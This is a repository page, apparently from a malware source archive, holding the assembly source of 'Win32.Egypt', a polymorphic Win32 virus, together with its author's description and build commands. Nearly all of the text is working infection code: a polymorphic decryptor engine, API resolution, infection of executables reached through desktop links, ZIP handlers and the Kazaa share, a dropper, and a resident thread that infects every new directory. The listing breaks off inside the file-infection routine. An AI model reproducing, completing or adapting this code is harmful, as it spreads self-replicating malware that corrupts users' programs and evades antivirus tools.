MalwareSourceCode/Win32/Win32.Egypt.asm
2020-10-10 22:07:43 -05:00

2468 lines
69 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;
;
;
;
;
; (Ermm...I'd higly appreciate if someone would take the pain
; of drawing a sphynx or a couple of pyramids here, because,
; as you can see, not only my asm skills suck...)
;
;
;
;
;
;
; Win32.Egypt
;
; ~~~~~~~~~~~
;
; @2005 TOE-VX
; ~~~~~~~~~~~~
;
;
;
;
;
;
;=============================================================================
; DISCLAIMER :
; ~~~~~~~~~~ This is the source of a VIRUS, The author is not
; responsible for any damage that may occur due to
; the assembly of this file. Use it at your own risk.
;
;=============================================================================
;
;
;
; * Targets : PE EXE Files.
;
; * Residence : Per Process Resident.
;
; * Hooked APIs : None.
;
; * Infection method : Every 8 seconds it will scan for directory change
; and infects all files in new directory
; this is a very efficient method to retrieve files.
; The virus will also search for all exe files pointed
; to by link files in the desktop and infect them.
; Also the virus will infect all applications used
; to open ZIP files. EXE files are infected by the
; classical method of adding the viral body to the
; section in the file.
;
; * EPO : None.
;
; * Polymorphism : Yes, The virus is polymorphic using its own engine.
; The virus uses slow polymorphism, utilizing a single
; decryptor for all files infected in the current run
; of the infected process. The polymorphic engine utilizes
; random registers, constructs calls to subroutines and
; also features conditional and unconditional jumps with
; non zero displacements. Yet it only utilizes a 32 bit
; xor operation. Although i coded this engine from scratch,
; i would like to thank GriYo, since i started writing
; "real" polymorphic engines only after i examined his
; 1996 Dos virus Implant.
;
; * Encryption : Yes, the virus is encrypted twice , the first decryptor
; is that generated by the polymorphic engine and the other
; decryptor is a fixed one with anti emulation trick.
; The encryption algorithm is just meant to be effective
; against scanners, not a one you would say much about.
;
; * Worming : Yes, the virus will infect all executables at the kazza
; shared folder, thus being able to pass to other PCs and
; thus exhibiting P2P worming, It will also create an
; executable file there and infect it, the executable
; file has a really attractive name ;) and a facked
; message in case the user runs it.
;
; * Misc : Reserves file attributes and time, Marks infected files
; Uses SEH to stabilize infected files
; Avoids infecting AVs as it will not infect files
; having AV,AN,DR,ID,OD,TB,F- in their names
; Avoids Infecting system files and avoids infecting
; DLLs misnamed as EXEs also doesn't infect compressed files
; Those extra checks give the virus very good performance
; and reduce error and corruption chances.
;
; * Payload : 1. On egyptian PCs it will display a funny message
; the message is randomly chosen from twenty messages
; the message will appear whenever an infected file
; is executed with a one over twenty five probability.
; I have included the english translations in the source
; in case somebody is interested.
;
; 2. On non-egyptian PCs it will change IE default homepage
; to the egyptain ministry of tourism webpage
; http://www.Touregypt.net, This will take place on the
; first and third friday of every month.
;
;
;=============================================================================
;
; Version History:
;=================
;
; 25-7-2005 version 1.0 finished
;
; 26-7-2005 Kaspersky detects version 1.0 , that's a really good job guys
; keep it up ;) and as usual they misname the virus as "Gypet" which rather
; sounds like a porn film title !! *^_^*
;
; 27-7-2005 version 1.2 that is a version 1.0 with slight code changes and
; comments
;
; 29-7-2005 I upgraded the virus to version 1.5 by adding a polymorphic
; engine.
;
;=============================================================================
;
; Things to be done in ver 2.0:
;==============================
;
; 1- New anti emulation tricks
; 2- ZIP infection
; 3- More worming strategies
; 4- SFC file protection awareness
; 5- EPO
; 6- Terminate AVers processes
;
;=============================================================================
;
; Greetings :
; ~~~~~~~~~~~
; Although almost everyone i will be greeting here has already quit writing
; viruses since a very long time now, i would still like to express my
; gratitude to them all.
;
; Nowhere Man : Everybody knows that VCL produced only lame viruses, yet its
; commented sources were excellent to teach me assembly in a stupid country
; lacking any books dedicated to assembly.
;
; Dark Angel : For presenting me to "real" Dos viruses.
;
; Neurobasher and vyvojar : For writing some of the best Dos viruses ever.
;
; 29A : For editing a really good virus magazine.
;
; Lord Julus : For being very friendly with me in our few email exchanges
; and for writing very friendly and useful articles. ( I like Rammstein too ;)
;
; The Mental Driller : For being THE most ethical virus writter ever as well
; as for writing some of the most complicated viruses ever.
;
; Zombie : For writing Mistfall.
;
; And greetings for all the other virus writers who exhibit ethical and
; friendly attitude and for those who write advanced and complicated research
; viruses.
;
;=============================================================================
;
; * To Assemble :
; ~~~~~~~~~~~~~~~
; tasm32 -ml -m5 -q -zn egypt.asm
; tlink32 -Tpe -c -x -aa egypt,,, import32
; pewrsec egypt.exe
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
.386p
.model flat
JUMPS
cmp_ macro reg,joff1
inc reg
jz joff1
dec reg
endm
apicall macro apioff
call dword ptr [ebp+apioff]
endm
.data
mark equ 04Ch
section_flags equ 00000020h or 20000000h or 80000000h
code_len equ code_end - code_start
L equ <LARGE>
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
GENERIC_READ_WRITE equ GENERIC_READ or GENERIC_WRITE
OPEN_EXISTING equ 00000003h
PAGE_READWRITE equ 00000004h
PAGE_WRITECOPY equ 00000008h
FILE_MAP_WRITE equ 00000002h
FILE_SHARE_READ equ 00000001h
FILE_ATTRIBUTE_NORMAL equ 00000080h
FILE_ATTRIBUTE_DIRECTORY equ 00000010h
FILE_BEGIN equ 00000000h
HKEY_CURRENT_USER equ 80000001h
KEY_SET_VALUE equ 00000002h
REG_SZ equ 00000001h
SPI_SETDESKWALLPAPER equ 00000020
CREATE_ALWAYS equ 00000002h
MB_ICONEXCLAMATION equ 00000030h
; Only hardcoded for 1st generation
kernel_ equ 0BFF70000h
kernel_wNT equ 077F00000h
shit_size equ delta-code_start
FILETIME struc
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struc
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup (?)
cAlternateFileName db 14 dup (?)
WIN32_FIND_DATA ends
SYSTEMTIME struc
wYear dw ?
wMonth dw ?
wDayOfWeek dw ?
wDay dw ?
wHour dw ?
wMinute dw ?
wSecond dw ?
wMilliseconds dw ?
SYSTEMTIME ends
; Functions imported by Generation-1 -
extrn ExitProcess:PROC
extrn GetModuleHandleA:PROC
extrn MessageBoxA:PROC
; Some dummy data for Generation-1 -
.data
dummy dd 0
;----------------------------------------------------------------------------
; CODE -
;----------------------------------------------------------------------------
.code
code_start:
call poly_dec
poly_enc:
popfd
popad
pushad
pushfd
call decrypt
enc:
call delta_
delta: db "Win32.Egypt v 1.5",0
db "(c) 2005 TOE-VX. Dedicated to my friends RNT and TRT.",0
db "A Big F#@! you to all the terrorists who commited"
db " the sharm massacre."
delta_: pop ebp
mov eax,ebp
sub ebp,offset delta
sub eax,shit_size
sub eax,00001000h
NewEIP equ $-4
mov dword ptr [ebp+module_base],eax
; Constructing SEH will allow the virus to run smoothly and stabilize
; infected files against crashes.
call ChangeSEH
mov esp,[esp+08h]
jmp RestoreSEH
ChangeSEH:
xor ebx,ebx
push dword ptr fs:[ebx]
mov fs:[ebx],esp
; Now we will get kernel 32 address
mov esi,[esp+2Ch]
and esi,0FFFF0000h
mov ecx,5
call GetK32
mov dword ptr [ebp+kernel],eax
; Now get the APIs
lea esi,[ebp+@@NamezCRC32]
lea edi,[ebp+@@Offsetz]
call GetAPIs
; Initialize random number generator
call irandom32
; Generate a polymorphic decryptor
call Poly
jc RestoreSEH
; Infect all applications used to deal with ZIP files and infect the
; Kazza shared folder, if any.
mov eax,[ori_eip+ebp]
mov [tmp_eip+ebp],eax
call infectzippers
mov eax,[tmp_eip+ebp]
mov [ori_eip+ebp],eax
; Infect all the files pointed to by links on the desktop
mov eax,[ori_eip+ebp]
mov [tmp_eip+ebp],eax
call infectlinks
mov eax,[tmp_eip+ebp]
mov [ori_eip+ebp],eax
; Launch a thread that will detect directory changes and infect files
; in new directories
call LaunchVirusMainThread
; Get the Message box API address, if we fail we will skip the payload
mov eax,offset u32_string
add eax,ebp
call VxGetModuleHandle
or eax,eax
je RestoreSEH
mov [user32+ebp],eax
mov edx,offset msgbox_string
add edx,ebp
mov eax,[user32+ebp]
call VxGetProcAddress
or eax,eax
je RestoreSEH
mov [_MessageBoxA+ebp],eax
; Check if we should make a payload or not and do it if necessary
call payload ;N.B. payload must be after zip infection
;as adavapi dll must be loaded
; Restore SEH and jump back to host
RestoreSEH:
xor ebx,ebx
pop dword ptr fs:[ebx]
pop eax
popfd
popad
mov ebx,12345678h
org $-4
ori_eip dd offset g1_quit - 400000h
add ebx,12345678h
org $-4
module_base dd 00400000h
push ebx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; P O L Y E N G I N E
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Poly:
push 00000040h
push 00001000h OR 00002000h
push 00001000h
push 0h
call dword ptr [_VirtualAlloc+ebp]
or eax,eax
jne contpoly
stc
ret
decplace dd 0h
dec_len dd 0h
viruslen dd 0h
keyy db 00h, 00h, 00h, 00h
contpoly:
mov dword ptr [ebp+decplace],eax
push eax
pop edi
; now edi points to place to put decryptor
; we want to generate a decryptor that looks like this :
; pop reg1
; push reg1
; xor reg2,reg2
; mov reg3,key
;dec_loop:
; xor dword ptr [reg1],reg3
; add reg1,4h
; inc reg2
; cmp reg2,((decrypt-enc)/4)+1
; jne dec_loop
; ret
no_reg1_ebp:
call getfreg ;gen pop reg1
cmp al,5
je no_reg1_ebp
mov byte ptr [ebp+regs],al
mov al,byte ptr[pops+eax+ebp]
stosb
mov ax,09c60h ;gen pushad&pushfd
stosw
mov dword ptr [ebp+regs+1],0
call garble
xor eax,eax
mov al,byte ptr[ebp+regs]
mov al,byte ptr[pushs+eax+ebp]
stosb
call garble
xor eax,eax ;gen xor/sub reg2,reg2
mov al,06h
call rndeax
cmp al,3h
jbe @xor
mov al,02bh
jmp @skipxor
@xor:
mov al,033h
@skipxor:
stosb
xor eax,eax
call getfreg
mov byte ptr [ebp+regs+1],al
mov bl,al
push ecx
mov cl,3
shl al,cl
pop ecx
add al,0c0h
add al,bl
stosb
call garble
call getfreg ;gen mov reg3,key
mov byte ptr [ebp+regs+2],al
add al,0b8h
stosb
call random32
mov word ptr[ebp+keyy],ax
stosw
call random32
mov word ptr[ebp+keyy+2],ax
stosw
call garble
mov dword ptr[ebp+loopplace],edi ; we will be loping
; here
call garble
mov al,31h ; gen xor[reg],reg
stosb
xor eax,eax
mov al,byte ptr [ebp+regs+2]
push ecx
mov cl,3
shl al,cl
pop ecx
mov ebx,eax
xor eax,eax
mov al,byte ptr [ebp+regs]
add eax,ebx
stosb
call garble
mov al,083h ;gen add reg1,4
stosb
xor eax,eax
mov al,byte ptr [ebp+regs]
add ax,04c0h
stosw
call garble
xor eax,eax
mov al,byte ptr [ebp+regs+1]
add al,40h
stosb
call garble
xor eax,eax
mov al,byte ptr [ebp+regs+1]
cmp al,0
jne @nf_eax
mov al,3dh
stosb
jmp @conttt
@nf_eax:
xchg al,ah
mov al,81h
stosb
xchg al,ah
add al, 0f8h
stosb
@conttt:
mov eax,((poly_end-poly_enc)/4)+1
stosw
xor eax,eax
stosw
mov ax,0574h
stosw
mov al,0e9h
stosb
mov eax,dword ptr[ebp+loopplace]
sub eax,edi
sub eax,4h ; ??
mov dword ptr[edi],eax
inc edi
inc edi
inc edi
inc edi
call garble
mov al,0c3h ;return
stosb
call garble
mov ecx,edi
sub ecx, dword ptr [ebp+decplace]
mov dword ptr [ebp+dec_len],ecx
mov dword ptr [ebp+viruslen],code_len
add dword ptr [ebp+viruslen],ecx
clc
ret
pushs:
push eax
push ecx
push edx
push ebx
push esp ;won't be used , naturally
push ebp
push esi
push edi
end_pushs:
pops:
pop eax
pop ecx
pop edx
pop ebx
pop esp
pop ebp
pop esi
pop edi
end_pops:
garble:
mov eax,((offset choices_end-choices)/4)
call rndeax
shl eax,2
add eax,ebp
add eax,offset choices
mov eax,[eax]
add eax,ebp
call eax
ret
choices:
dd offset garblock
dd offset pushpop
dd offset abs_jmp
dd offset backcall
dd offset cond_jmp
dd offset cond_shit
choices_end:
jmplocation dd 0h
calllocation dd 0h
cond_jmp:
xor eax,eax
mov al,10h
call rndeax
add al,070h
stosb
stosb
mov dword ptr [ebp+jmplocation],edi
call garblock
mov eax,dword ptr [ebp+jmplocation]
sub eax,edi
push edi
mov edi,dword ptr [ebp+jmplocation]
dec edi
neg al
stosb
pop edi
ret
backcall:
mov al,0ebh
stosb
stosb
mov dword ptr [ebp+jmplocation],edi
call abs_shit
mov dword ptr [ebp+calllocation],edi
call garblock
mov al,0c3h
stosb
call abs_shit
mov eax,dword ptr [ebp+jmplocation]
sub eax,edi
push edi
mov edi,dword ptr [ebp+jmplocation]
dec edi
neg al
stosb
pop edi
mov al,0e8h
stosb
mov eax,(0ffffh -3h)
sub eax,edi
add eax,dword ptr [ebp+calllocation]
stosw
mov ax,0ffffh
stosw
ret
cond_shit:
xor eax,eax
mov al,80h
call rndeax
cmp al,40h
je stc_
mov ax,073f8h
stosw
call abs_shit
ret
stc_:
mov ax,072f9h
stosw
call abs_shit
ret
abs_jmp:
mov al,0ebh
stosb
call abs_shit
ret
abs_shit:
mov eax,20h
call rndeax
stosb
mov ecx,eax
shitloop:
push ecx
call random32
pop ecx
stosb
loop shitloop
ret
pushpop:
call getreg
add eax,ebp
add eax,offset pushs
mov al,byte ptr [eax]
stosb
call garblock
call getfreg
add eax,ebp
add eax,offset pops
mov al,byte ptr [eax]
stosb
ret
garblock:
xor eax,eax
mov al,7h
call rndeax
add al,3
mov ecx,eax
loph:
push ecx
call garbage
pop ecx
loop loph
ret
garbage:
xor eax,eax
mov al,100
call rndeax
cmp al,30 ;30% reg imm
jbe regimm
cmp al,40 ;10% rem mem
jbe regmem
cmp al,50 ;10% one byte
jbe onebyte
jmp regreg ;50% reg reg
onebyte:
mov eax,offset one_end-one
call rndeax
mov ebx,eax
add ebx,ebp
add ebx,offset one
mov al,byte ptr [ebx]
stosb
ret
regmem:
mov eax,offset (etwobitinstrs- twobitinstrs)
call rndeax
mov ecx,offset twobitinstrs
add ecx,eax
mov al,byte ptr [ecx+ebp]
or al,al
je regmem
stosb
call getfreg
mov ecx,3
shl al,cl
mov ebx,eax
mov al,08h
mov al,byte ptr [ebp+regs]
add eax,ebx
stosb
ret
regimm:
;generate op reg,imm (eax not included)
mov al,81h
stosb
mov al,8
call rndeax
push ecx ;we now need to make *8
xor ecx,ecx
mov cl,3
shl al,cl
pop ecx
add al,0c1h
mov ebx,eax
call getfreg
dec eax ;coz eax has no opcode
add eax,ebx
stosb
call random32
stosw
call random32
stosw
ret
regreg:
;generate op reg,reg
mov eax, offset (etwobitinstrs- twobitinstrs)
call rndeax
xor ebx,ebx
mov bl,al
add ebx,offset twobitinstrs
add ebx,ebp
mov al,byte ptr [ebx]
or al,al
je regreg
stosb
call getfreg
push ecx
mov cl,3
shl al,cl
pop ecx
mov ebx,eax
add bl,0c0h
call getfreg
add bl,al
xchg eax,ebx
stosb
ret
getfreg: ;get free reg
xor eax,eax
f_esp:
mov al,8
call rndeax
cmp al,4
je f_esp
cmp byte ptr[ebp+regs],al
je f_esp
cmp byte ptr[ebp+regs+1],al
je f_esp
cmp byte ptr[ebp+regs+2],al
je f_esp
ret
getreg:
xor eax,eax
mov al,8
call rndeax
ret
loopplace dd 0h
fromhere dd 0h
regs:
db 0
db 0
db 0
twobitinstrs:
db 23h ;and
db 3bh ;cmp
db 0bh ;or
db 8bh ;mov
db 33h ;xor
db 03h ;add
db 2bh ;sub
etwobitinstrs:
one:
NOP
CLC
STC
one_end:
; POLY ENGINE ENDS HERE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all files pointed to by links on the desktop
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectlinks:
mov edi,ebp
add edi,offset olddir
mov al,0
mov ecx,128
rep stosb
push ebp
push L 128
mov eax,ebp
add eax,offset olddir
push eax
call [_GetWindowsDirectoryA+ebp]
pop ebp
mov edi,ebp
add edi,offset olddir
add edi,eax
mov esi,ebp
add esi,offset desktop
mov ecx,9
rep movsb
push ebp
mov eax,ebp
add eax,offset currdir
push eax
push L 128
call [_GetCurrentDirectoryA+ebp]
pop ebp
mov edx,ebp
add edx,offset olddir
push edx
call [ebp+_SetCurrentDirectoryA]
call searchlinks
mov edx,ebp
add edx,offset currdir
push edx
call [ebp+_SetCurrentDirectoryA]
ret
searchlinks:
push ebp
mov eax,offset wfd
add eax,ebp
push eax
mov eax,offset lnk_match
add eax,ebp
push eax
call [_FindFirstFileA+ebp]
pop ebp
inc eax
or eax,eax
je icd_end2
dec eax
mov [search_handle2+ebp],eax
mov edx,offset wfd.cFileName
add edx,ebp
call infectlink
fnf_loop2:
mov edx,ebp
add edx,offset olddir
push edx
call [ebp+_SetCurrentDirectoryA]
push ebp
mov eax,offset wfd
add eax,ebp
push eax
push [search_handle2+ebp]
call [_FindNextFileA+ebp]
pop ebp
cmp eax,0
je icd_end2
mov edx,offset wfd.cFileName
add edx,ebp
call infectlink
jmp fnf_loop2
icd_end2:
push [search_handle2+ebp]
call [ebp+_FindClose]
ret
infectlink:
push 0
push 0
push OPEN_EXISTING
push 0
push 0
push GENERIC_READ+GENERIC_WRITE
push edx
call [ebp+_CreateFileA]
mov [ebp+hfile2], eax
push 0
push eax
call [ebp+_GetFileSize]
push eax
push 0
push eax
push 0
push PAGE_READWRITE
push 0
push [ebp+hfile2]
call [ebp+_CreateFileMappingA]
mov [ebp+hmap2], eax
pop eax
push eax
push eax
push 0
push 0
push 2 ;FILE_MAP_ALL_ACCESS
push [ebp+hmap2]
call [ebp+_MapViewOfFile]
mov [ebp+haddress2], eax
pop ebx ; length
push eax
pop edx
add ebx,edx
scashit:
inc edx
cmp edx,ebx
jae invalidlnk
cmp word ptr [edx], "\:"
jne scashit
scashit2:
inc edx
cmp edx,ebx
jae invalidlnk
cmp word ptr [edx], "\:"
jne scashit2
dec edx
call InfectFile
invalidlnk:
push [ebp+haddress2]
call [ebp+_UnmapViewOfFile]
push [ebp+hmap2]
call [ebp+_CloseHandle]
push [ebp+hfile2]
call [ebp+_CloseHandle]
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all Applications that are used to open ZIPs
; and drop the file on kazaa's shared folder, if any
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
infectzippers:
pushad
mov eax,offset a32_string
add eax,ebp
call VxGetModuleHandle
or eax,eax
je @@@End
mov [advapi32+ebp],eax
mov edx,offset regopen_string
add edx,ebp
mov eax,[advapi32+ebp]
call VxGetProcAddress
or eax,eax
je @@@End
mov [_RegOpenKeyExA+ebp],eax
mov edx,offset regget_string
add edx,ebp
mov eax,[advapi32+ebp]
call VxGetProcAddress
or eax,eax
je @@@End
mov [_RegQueryValueExA+ebp],eax
mov edx,offset Regset
add edx,ebp
mov eax,[advapi32+ebp]
call VxGetProcAddress
or eax,eax
je @@@End
mov [_RegSetValueExA+ebp],eax
mov edx,offset close_string
add edx,ebp
mov eax,[advapi32+ebp]
call VxGetProcAddress
or eax,eax
je @@@End
mov [_RegCloseKey+ebp],eax
player_loop:
mov eax,offset HandleOpenedKey
add eax,ebp
push eax
push 000F003Fh ;KEY_ALL_ACCESS
push 0
call pushstring
db "Software\Microsoft\Windows\CurrentVersion\Explorer\"
db "FileExts\.zip\OpenWithList",0
pushstring:
push 80000001h ;HKEY_CURRENT_USER
call [ebp+ _RegOpenKeyExA]
or eax, eax
jnz @@End
call clean_buff
mov eax,offset buff_
add eax,ebp
push eax
mov eax, offset buff
add eax,ebp
push eax
push 0
push 0
call pushvalue
player db "a",0
pushvalue:
push dword ptr [ebp+HandleOpenedKey]
call [ebp+_RegQueryValueExA]
push dword ptr [ebp+ HandleOpenedKey]
call [ebp+_RegCloseKey] ; Close key handle
mov esi,offset buff
mov edi,offset prog_buffer
add esi,ebp
add edi,ebp
next_copy:
lodsb
cmp al,0
je copy_done
stosb
jmp next_copy
copy_done:
mov esi,offset part2
add esi,ebp
mov ecx,part2_len
rep movsb
mov eax, offset HandleOpenedKey
add eax,ebp
push eax
push 000F003Fh ;KEY_ALL_ACCESS
push 0
mov eax, offset prog_itself
add eax,ebp
push eax
push 80000000h ;HKEY_CLASSES_ROOT
call [ebp+_RegOpenKeyExA]
or eax, eax
jnz @@End
call clean_buff
mov eax, offset buff_
add eax,ebp
push eax
mov eax, offset buff
add eax,ebp
push eax
push 0
push 0
push 0 ;Default value
push dword ptr [ebp+HandleOpenedKey]
call [ebp+_RegQueryValueExA]
push dword ptr [ebp+HandleOpenedKey]
call [ebp+ _RegCloseKey]
mov esi,ebp
add esi,offset buff
push esi
loopsearch:
cmp dword ptr [esi],"exe."
je reached
cmp dword ptr [esi],"EXE."
je reached
inc esi
jmp loopsearch
reached:
add esi,4
push esi
pop edi
mov al,0
stosb
pop esi
first_loop:
mov ax,word ptr [esi+1]
cmp ax, "\:"
je skip_dec
inc esi
jmp first_loop
skip_dec:
mov edx,esi
call InfectFile
inc byte ptr [ebp+player]
jmp player_loop
@@End:
mov byte ptr [ebp+player],"a"
mov eax,offset HandleOpenedKey
add eax,ebp
push eax
push 000F003Fh ;KEY_ALL_ACCESS
push 0
call pushstring2
db "SOFTWARE\KAZAA\LocalContent",0
pushstring2:
push 80000002h ;HKEY_CURRENT_USER
call [ebp+ _RegOpenKeyExA]
or eax, eax
jnz @@@End
call clean_buff
mov eax,offset buff_
add eax,ebp
push eax
mov eax, offset buff
add eax,ebp
push eax
push 0
push 0
call pushvalue2
db "DownloadDir",0
pushvalue2:
push dword ptr [ebp+HandleOpenedKey]
call [ebp+_RegQueryValueExA]
push dword ptr [ebp+ HandleOpenedKey]
call [ebp+_RegCloseKey]
push ebp
mov eax,ebp
add eax,offset currdir
push eax
push L 128
call [_GetCurrentDirectoryA+ebp]
pop ebp
mov edx,ebp
add edx,offset buff
push edx
call [ebp+_SetCurrentDirectoryA]
call InfectCurrentDirectory
call dropfile
mov edx,ebp
add edx,offset currdir
push edx
call [ebp+_SetCurrentDirectoryA]
@@@End:
popad
ret
clean_buff:
pushad
mov edi,offset buff_
add edi,ebp
mov dword ptr [edi],030h
add edi,4
mov ecx,30h
mov al,0
rep stosb
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Drop a file in kazza's shared folder
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
dropfile:
mov edx,ebp
add edx,offset fileee
push edx
call [ebp+_GetFileAttributesA]
inc eax
or eax,eax
je makeit
ret
makeit:
push 0
push 0
push 1 ; Create new
push 0
push 0
push GENERIC_READ+GENERIC_WRITE
mov edx,ebp
add edx,offset fileee
push edx
call [ebp+_CreateFileA]
mov [ebp+hfile],eax
push 0
mov eax,4096 ;note that the filesize is hardcoded
push eax
push 0
push PAGE_READWRITE
push 0
push [ebp+hfile]
call [ebp+_CreateFileMappingA]
mov [ebp+hmap], eax
mov eax,4096
push eax
push 0
push 0
push 2 ;FILE_MAP_ALL_ACCESS
push [ebp+hmap]
call [ebp+_MapViewOfFile]
mov [ebp+haddress], eax
mov edi,eax
mov esi,ebp
add esi, offset dropstart
mov ecx,dropend-dropstart
nextat: ; Decompress compressed dropper
lodsb ; file, i would like to thank
or al,al ; Vecna for simple decompressor
jnz nextbit
dec ecx
dec ecx
push ecx
lodsw
xor ecx,ecx
mov cx,ax
mov al,0
rep stosb
pop ecx
loop nextat
jcxz quitta
nextbit:
stosb
loop nextat
quitta:
push [ebp+haddress]
call [ebp+_UnmapViewOfFile]
push [ebp+hmap]
call [ebp+_CloseHandle]
push [ebp+hfile]
call [ebp+_CloseHandle]
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Get Kernel32 address, thanks billy !
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetK32:
_@1: jecxz WeFailed
mov cx,word ptr [esi]
xor cx,"4k"
cmp cx,"ZM"xor "4k"
jz CheckPE
_@2: sub esi,10000h
dec ecx
jmp _@1
CheckPE:
mov edi,[esi+3Ch]
add edi,esi
mov cx,word ptr [edi]
xor cx,"3a"
cmp cx,"EP"xor "3a"
jz WeGotK32
jmp _@2
WeFailed:
mov ecx,cs
xor cl,cl
jecxz WeAreInWNT
mov esi,kernel_
jmp WeGotK32
WeAreInWNT:
mov esi,kernel_wNT
WeGotK32:
xchg eax,esi
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Get APIs , also thanks billy !
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetAPIs:
@@1: lodsd
push esi
push edi
call GetAPI_ET_CRC32
pop edi
pop esi
stosd
cmp byte ptr [esi],0BBh ; Last API?
jz @@4
jmp @@1
@@4: ret
GetAPI_ET_CRC32:
xor edx,edx
xchg eax,edx
mov word ptr [ebp+Counter],ax
mov esi,3Ch
add esi,[ebp+kernel]
lodsw
add eax,[ebp+kernel]
mov esi,[eax+78h]
add esi,1Ch
add esi,[ebp+kernel]
lea edi,[ebp+AddressTableVA]
lodsd
add eax,[ebp+kernel]
stosd
lodsd
add eax,[ebp+kernel]
push eax
stosd
lodsd
add eax,[ebp+kernel]
stosd
pop esi
@?_3: push esi
lodsd
add eax,[ebp+kernel]
xchg edi,eax
mov ebx,edi
push edi
xor al,al
scasb
jnz $-1
pop esi
sub edi,ebx
push edx
call CRC32
pop edx
cmp edx,eax
jz @?_4
pop esi
add esi,4
inc word ptr [ebp+Counter]
jmp @?_3
@?_4:
pop esi
movzx eax,word ptr [ebp+Counter]
shl eax,1
add eax,dword ptr [ebp+OrdinalTableVA]
xor esi,esi
xchg eax,esi
lodsw
shl eax,2
add eax,dword ptr [ebp+AddressTableVA]
xchg esi,eax
lodsd
add eax,[ebp+kernel]
ret
CRC32:
cld
xor ecx,ecx
dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This is the virus resident part, it will detect directory
; change every 8 seconds and infect all files in the new one
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
VThread:
call get_delta
get_delta:
pop ebp
sub ebp,offset get_delta
@loophere:
mov eax,[ori_eip+ebp]
mov [tmp_eip+ebp],eax
call InfectCurrentDirectory
mov eax,[tmp_eip+ebp]
mov [ori_eip+ebp],eax
@sleepagain:
push 8000
call [ebp+_Sleep]
push ebp
mov eax,ebp
add eax,offset currdir
push eax
push L 128
call [_GetCurrentDirectoryA+ebp]
pop ebp
mov esi,ebp
mov edi,esi
add esi,offset currdir
add edi,offset olddir
xor ecx,ecx
mov cl,128
rep cmpsb
je @sleepagain
mov esi,ebp
mov edi,esi
add esi,offset currdir
add edi,offset olddir
xor ecx,ecx
mov cl,128
rep movsb
jmp @loophere
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; This will launch the virus resident part
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
LaunchVirusMainThread:
pushad
lea ebx,[ebp+offset ThreadID3]
push ebx
push 4h
push 0h
lea ebx,[ebp+offset VThread]
push ebx
push 0h
push 0h
call [ebp+_CreateThread]
or eax,eax
je @noway
push eax
push -1h ;low priority
push eax
call [ebp+_SetThreadPriority]
call [ebp+_ResumeThread]
@noway:
popad
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infect all EXE files in current directory
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InfectCurrentDirectory:
push ebp
mov eax,offset wfd
add eax,ebp
push eax
mov eax,offset exe_match
add eax,ebp
xor [eax],"Shit"
push eax
call [_FindFirstFileA+ebp]
pop ebp
push eax
mov eax,offset exe_match
add eax,ebp
xor [eax],"Shit"
pop eax
inc eax
or eax,eax
je icd_end
dec eax
mov [search_handle+ebp],eax
mov edx,offset wfd.cFileName
add edx,ebp
call InfectFile
fnf_loop:
push ebp
mov eax,offset wfd
add eax,ebp
push eax
push [search_handle+ebp]
call [_FindNextFileA+ebp]
pop ebp
or eax,eax
je icd_end
mov edx,offset wfd.cFileName
add edx,ebp
call InfectFile
jmp fnf_loop
icd_end:
push [search_handle+ebp]
call [ebp+_FindClose]
ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Infects EXE file pointed to by EDX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
InfectFile:
push edx ; Don't infect AVs , thanks
